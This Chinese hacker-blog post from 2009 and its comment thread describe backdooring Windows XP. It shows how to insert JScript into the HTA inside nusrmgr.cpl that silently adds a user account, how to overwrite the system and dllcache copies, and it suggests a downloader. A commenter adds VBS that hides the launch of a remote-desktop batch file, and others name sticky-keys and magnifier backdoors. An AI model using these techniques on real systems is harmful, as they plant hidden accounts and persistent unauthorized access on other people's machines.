利用cpl文件在xp中留一个后门

2009/07/02 18:11 | 鬼仔 | 技术文章 | 占个座先

# 鬼仔:为了不让首页截断部分出现图片,因为把图片位置换了下,不知道lcx会不会介意。

作者:lcx

这是我用restorator 打开nusrmgr.cpl时的情形。你看到了什么?是不是很吃惊,原来xp中控制面板中的“用户帐户”选项竟然是html做的。其实不然,微软的好多组 件的面板都是html做的。这也是微软为什么一直无法清掉ie的原因,它牵涉太多了,就算是反垄断法也不可能让微软删掉ie的。

看到图中的那个NUSRMGR.HTA文件了吗?我们可以用它来做下手脚(当然你选别的js文件也是可以的)

xpl_xp

我们在里边加几行js语句:

var WshShell = CreateObject("WScript.Shell")
WshShell.Run("net.exe user lcx lcx /add", 0, true)

当然你加下载者更好,我只是做个示例。

然后:

echo y|copy nusrmgr.cpl c:\windows\system32\dllcache\nusrmgr.cpl
echo y|copy nusrmgr.cpl c:\windows\system32\nusrmgr.cpl

替换原来的文件。这样以后用户再调用控制面板里的“用户帐户”选项后,就会自动给你加一个帐户了。

这算是一个思路了,应当很鸡肋。如果要完美一点,可以查看一下别的cpl文件如何更改,如何无声无息的替掉原来的文件(如镜像劫持)。

Tags: , ,

相关日志

楼被抢了 18 层了... 抢座Rss 2.0或者 Trackback

  • ben | 2009-07-02 20:09 | #

    的确现在这个比较鸡肋,首先要得到主机的权限——至少要可以修改这些文件,而且,必须要在对方调用的时候才能执行成功。不过这个发现的确很有趣。以前发现QQ的许多页面是HTML的,不过没想到微软也是这么做的。

    鬼仔老大,你的博客可真够猛的,我昨天看到lcx老大顺手留了个言,今天居然带过来好几个IP的访客,你真是我优质偶像啊,崇拜~

    回复该留言
    • 颉少 | 2009-07-02 20:54 | #

      呵呵,我都崇拜鬼孜好多年了.我论坛里很多东西都是转鬼仔这的.嘿嘿,希望鬼仔不要介意,我都有注名来源的.

      回复该留言
    • 鬼仔 | 2009-07-03 13:55 | #

      不能说鸡肋,是一种思路。
      是啊,lcx老大亲自来了,我也感觉很荣幸啊

      回复该留言
  • chuxinake | 2009-07-03 08:23 | #

    看了很久你的博客,这次终于我开口了
    可以往里面加个隐藏运行bat的vbs
    set ws=wscript.createobject(“wscript.shell”)
    ws.run “3389.bat /start”,0
    3389.bat里你想写什么酒可以写什么了

    回复该留言
  • wavs1984 | 2009-07-03 11:28 | #

    恩 学习了 ~~膜拜一下

    回复该留言
  • xiaoL | 2009-07-03 12:49 | #

    鬼哥,一直在关注你BLOG。

    希望能做到经常更新。

    回复该留言
  • virus8 | 2009-07-06 11:54 | #

    还是顶上去吧。呵~思路不错。呵

    回复该留言
  • 枫子 | 2009-07-07 03:14 | #

    WP貌似可以自己写摘要把..

    回复该留言
  • renenglish | 2009-07-08 23:50 | #

    啥也不说了,你太强了,虽然是转的,但做到常常更新却不容易,你怎么做到的?

    回复该留言
  • 老黄牛 | 2009-09-24 13:42 | #

    真是邪恶的东西啊

    感谢鬼仔这么好的博客啊

    总是有好玩的东西出现

    回复该留言
  • 小海 | 2009-12-09 14:37 | #

    这个太强大了,提权方便了。

    回复该留言
  • 帅,是一种寂寞 | 2010-01-30 11:19 | #

    这样提权,还不如用其它几个更加常用的XP
    1.粘滞键; 2.放大镜和语音快捷键后门; 对吧

    回复该留言

发表评论